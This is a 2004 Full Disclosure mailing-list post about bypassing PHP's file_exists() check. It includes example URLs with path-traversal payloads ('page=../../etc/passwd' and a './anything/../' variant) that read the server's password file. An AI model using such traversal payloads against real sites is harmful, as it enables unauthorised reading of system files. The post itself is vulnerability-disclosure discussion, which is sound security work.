Full Disclosure mailing list archives

RE: file_exists() bypassing , critical problem ?

From: "Nourredine Himeur" <lostnoobs () security-challenge com>
Date: Mon, 2 Feb 2004 15:12:25 +0100

Hi,

It depends of your php configuration... (but it's not a vulnerability so
..... i can say you what's the configuration is good ,because firstly nobody
listen me and secondly php-group are blind and deaf)

look this :

http://lists.netsys.com/pipermail/full-disclosure/2004-February/016612.html

http://www.opensavoir.com/test.txt
http://www.opensavoir.com/test.php


http://www.opensavoir.com/test.php?page=../../../../../../../../../../etc/pa
sswd

but it's not a vulnerability HA ! HA ! HA ! show this :

http://www.opensavoir.com/test.php?page=./anything/../../../../../../../../.
./../etc/passwd

:)


Nourredine Himeur

www.security-challenge.com



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Re: Re: file_exists() bypassing , critical problem ?, (continued)
- - Re: Re: file_exists() bypassing , critical problem ? m.esco (Feb 02)
    - Re: Re: file_exists() bypassing , critical problem ? Nourredine Himeur (Feb 02)
    - Re: Re: file_exists() bypassing , critical problem ? Stefan Esser (Feb 02)
    - Re: file_exists() bypassing , critical problem ? Daniel B (Feb 02)
  - Message not available
    - Re: file_exists() bypassing , critical problem ? Nourredine Himeur (Feb 02)
  - Re: Re: file_exists() bypassing , critical problem ? VeNoMouS (Feb 02)
- Re: Re: Re: file_exists() bypassing , critical problem ? Nourredine Himeur (Feb 02)
- Re: file_exists() bypassing , critical problem ? first-name last-name (Feb 02)
- file_exists() bypassing , critical problem ? Nourredine Himeur (Feb 02)
  - Re: file_exists() bypassing , critical problem ? Jorrit Kronjee (Feb 02)
- RE: file_exists() bypassing , critical problem ? Nourredine Himeur (Feb 02)